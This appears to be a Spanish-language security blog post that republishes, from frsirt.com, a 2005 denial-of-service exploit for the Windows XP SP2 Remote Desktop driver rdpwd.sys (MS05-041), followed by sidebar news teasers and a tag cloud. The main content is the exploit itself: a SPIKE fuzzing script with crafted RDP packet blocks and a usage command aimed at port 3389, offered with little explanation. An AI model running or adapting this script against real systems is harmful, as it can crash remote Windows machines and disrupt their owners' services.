Exploit para Microsoft Windows Remote Desktop Protocol DoS (MS05-041)


Exploit publicado en frsirt.com, dicho exploit hace referencia al MS05-041





Advisory : FrSIRT/ADV-2005-1113
Rated as : Moderate Risk
Port : 3389

// Windows XP SP2 'rdpwd.sys' Remote Kernel DoS
//
// Discovered by:
// Tom Ferris
// tommy[at]security-protocols[dot]com
//
// Tested on:
// Microsoft Windows XP SP2
//
// Usage (SPIKE) : ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0
//
// 8/9/2005 Security-Protocols.com
//
// This program is free software; you can redistribute it and/or modify it under
// the terms of the GNU General Public License version 2, 1991 as published by
// the Free Software Foundation.

s_block_start("packet_1");
s_string_variable("03");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D
73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D 0A");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A");
s_string_variable("");
s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41");
s_string_variable("");
s_block_end("packet_1");

s_block_start("packet_2");
s_int_variable(0x0500,5);
s_block_end("packet_2");

s_block_start("packet_3");
s_binary("000002020000");
s_string_variable("");
s_block_end("packet_3");

Fuente
frsirt.com



Otras noticias de interés:

Libro sobre: Implementación de Servidores con GNU/Linux
El amigo Joel Barrios a públicado su más reciente versión de un Libro denominado: Implementación de Servidores con GNU/Linux., en una entrega completamente digital en formato PDF. Esta edición tiene un total de 680 páginas y acumula más de 11 ...
Asturix la distribución GNU/Linux de Asturias
Una de las distros españolas, con alrededor de 2000 usuarios y acompañada de una comunidad de desarrolladores. Asturix viene en 3 versiones para que elijas: ...
Buscador de xombra.com para Firefox
El fichero ocupa aproximadamente de 1 KB, y resulta muy útil para los usuarios de xombra.com que emplean Firefox....
Doce boletines de seguridad para Windows y Office
Microsoft planea para este mes, un total de doce boletines de seguridad, 10 de ellos relacionados con Microsoft Windows, y dos con Microsoft Office. Los mismos fueron publicados el martes 8 de agosto....
Disponible Cotejo #06
Disponible para su lectura y descarga el número 6 de nuestra eZine Cotejo de VaSlibre, la revista digital referente al Software Libre (GNU/Linux). Disfrutenla!. Estan invitados a enviar sus artículos para la edición especial del mes de diciembre....
Graves vulnerabilidades en CUPS
Las versiones de CUPS no actualizadas contienen numerosas vulnerabilidades que permiten matar el servidor, sobreescribir ficheros arbitrarios en la máquina y obtener privilegios adicionales como los usuarios root y lp. ...
Un nuevo malware sobrescribe las actualizaciones de Adobe
Es la primera vez que se ve un malware que se sobrescribe en lugar de enmascararse como un programa de actualización....
Un Mouse de Computador Controlado Por Voz
Muchas personas con discapacidades se benefician de herramientas informáticas que les facilitan el manejo de los ordenadores. Sin embargo, no pocas de esas mismas personas encuentran frustrante o imposible de usar el ratón convencional que se debe ...
Oracle no participará con LibreOffice
La respuesta de Oracle a LibreOffice no se ha hecho esperar.. y ha sido un rotundo y político NO....
Adobe sigue ofreciendo su vulnerable lector de PDFs
Adobe sigue ofreciendo para descargar en su web la versión 9.1 de Adobe Reader. Esa versión fue actualizada en mayo y posteriormente en junio debido a una serie de vulnerabilidades críticas....

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • desktop
  • dos
  • exploit
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • protocol
  • remote
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra